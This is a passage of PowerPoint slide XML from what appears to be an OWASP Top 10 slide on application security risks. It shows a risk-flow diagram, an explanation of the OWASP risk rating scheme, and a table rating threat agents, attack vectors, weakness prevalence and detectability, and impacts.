              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362200" y="3800475"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2640" y="2743"/>
                <a:ext cx="528" cy="288"/>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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="98" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="56" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="44026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2" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="3" idx="3"/>
              <a:endCxn id="79" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="2666731"/>
              <a:ext cx="228600" cy="269"/>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5" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="66" idx="3"/>
              <a:endCxn id="80" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="3104885"/>
              <a:ext cx="228599" cy="265"/>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4" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="238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20" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="64" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="242873"/>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6" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2667000"/>
              <a:ext cx="457200" cy="233348"/>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58" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="80" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4190999" y="2900348"/>
              <a:ext cx="457201" cy="20480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33" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="419100"/>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88" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="81" idx="3"/>
              <a:endCxn id="62" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4191000" y="3290903"/>
              <a:ext cx="457200" cy="709597"/>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91" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="85" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490728" cy="897466"/>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0" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="85" idx="3"/>
              <a:endCxn id="81" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505199" y="4000235"/>
              <a:ext cx="228601" cy="265"/>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7" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="62" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="633428"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3659399" y="2090853"/>
              <a:ext cx="590226"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smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Controls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Security Risks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>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dirty="0" smtClean="0"/>
              <a:t>Risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 68"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5105401"/>
          <a:ext cx="4495800" cy="4039178"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4495800"/>
              </a:tblGrid>
              <a:tr h="334702">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0" smtClean="0"/>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> Risk?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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tr>
              <a:tr h="37038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700" kern="1200" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Only you</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack, or the technical impact may not make any difference to your business. Therefore, you should evaluate each risk </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>for yourself</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, focusing on the threat agents, security controls, and business impacts in your enterprise. We list Threat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Agents</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> as Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific, and Business Impacts as Application / Business Specific to indicate these are clearly dependent on the details about your application in your enterprise.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose names that accurately reflect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the risks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and, where possible, align</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> with common terminology most likely to</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> raise awareness.</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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="72" name="Table 71"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="6248400"/>
          <a:ext cx="4191001" cy="1051560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="620889"/>
                <a:gridCol w="737306"/>
                <a:gridCol w="737306"/>
                <a:gridCol w="737306"/>
                <a:gridCol w="672392"/>
                <a:gridCol w="685802"/>
              </a:tblGrid>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Threat</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Agents</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attack</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Vectors</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Weakness Prevalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Weakness Detectability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Technical Impacts</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Business Impacts</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="152400">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="1"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900" dirty="0" smtClean="0"/>
                        <a:t>Easy</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Widespread</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Easy</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Severe</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>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50" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> / Business Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="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r h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Average</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Common</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Average</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Moderate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Difficult</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Uncommon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Difficult</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Minor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="71" name="Table 70"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="599018909"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="5104822"/>
          <a:ext cx="2236914" cy="4039178"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2236914"/>
              </a:tblGrid>
              <a:tr h="334702">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>References</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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tr>
              <a:tr h="37038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700" kern="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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
